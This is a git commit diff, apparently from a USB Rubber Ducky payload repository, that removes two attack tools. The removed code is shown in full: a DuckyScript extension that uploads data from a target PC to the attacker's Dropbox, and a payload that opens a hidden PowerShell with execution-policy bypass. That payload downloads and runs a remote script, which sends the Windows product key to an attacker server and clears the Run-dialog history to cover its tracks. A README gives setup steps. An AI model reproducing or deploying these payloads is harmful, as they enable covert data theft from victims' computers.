Remove 1 extension and 1 payload
- Remove "PowerShell To Dropbox" extension - Remove "Windows Product Duckey" payloadpull/431/head
Julien M
parent
bf2dfb7c17
commit
761a5fa08c
|
|
@ -1,25 +0,0 @@
|
|||
EXTENSION PowerShell_To_Dropbox
|
||||
|
||||
REM Title: PowerShell_To_Dropbox
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This DuckyScript extension exfiltrates data (for example the result of a command) from the target computer by submitting a file to your Dropbox.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM For usage instructions look at https://github.com/Who-Is-Julien/Ducky-Utilities/blob/main/PowerShell_To_Dropbox/README.md
|
||||
|
||||
|
||||
DEFINE REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
DEFINE APP_KEY XXXXXXXXXXXXXXX
|
||||
DEFINE APP_SECRET XXXXXXXXXXXXXXX
|
||||
|
||||
STRING Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "
|
||||
STRING REFRESH_TOKEN
|
||||
STRING "; client_id = "
|
||||
STRING APP_KEY
|
||||
STRING "; client_secret = "
|
||||
STRING APP_SECRET
|
||||
STRING "}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body $report | Out-Null
|
||||
DELAY 500
|
||||
ENTER
|
||||
|
||||
END_EXTENSION
|
||||
|
|
@ -1,34 +0,0 @@
|
|||
<h1 align="center">
|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Product+Duckey+🦆🔑">
|
||||
</a>
|
||||
</h1>
|
||||
|
||||
## Description
|
||||
|
||||
This payload exfiltrate the target's Windows product key to a remote server. *Only works on Windows 10,11.*
|
||||
|
||||
## Usage
|
||||
|
||||
### Setup
|
||||
|
||||
- Set up a website on your server or a computer in the same network as the target's computer. You can use Python to do this by running the following command:
|
||||
```
|
||||
python -m http.server 80
|
||||
```
|
||||
- Download the "payload.txt" and "script.ps1" files and modify them to include the IP address of your server.
|
||||
- Move the modified "script.ps1" file to the root directory of your website, so it is downloadable from this address:
|
||||
```
|
||||
http://<REMOTE_IP_ADDRESS>/script.ps1
|
||||
```
|
||||
|
||||
### Analysis
|
||||
|
||||
Once the payload is executed, you can find the target's IP address and Windows product key by checking your website logs.
|
||||
|
||||
|
||||
***Note**: This script is designed to send the results to a specific server, so you don't have to rely on any file sharing services. Additionally, you can easily adapt it to work with encrypted sites.*
|
||||
|
||||
---
|
||||
|
||||
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*
|
||||
|
|
@ -1,17 +0,0 @@
|
|||
REM Title: Windows Product Duckey
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
DEFINE REMOTE_IP_ADDRESS 192.168.1.10
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
|
||||
STRING REMOTE_IP_ADDRESS
|
||||
STRING /script.ps1; iex $pl
|
||||
DELAY 500
|
||||
ENTER
|
||||
|
|
@ -1,4 +0,0 @@
|
|||
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
||||
|
|
@ -1,8 +0,0 @@
|
|||
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
#Clear windows run dialog history
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
#Retrieve and send the computer's original product key to a remote server
|
||||
Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
||||
Loading…
Reference in New Issue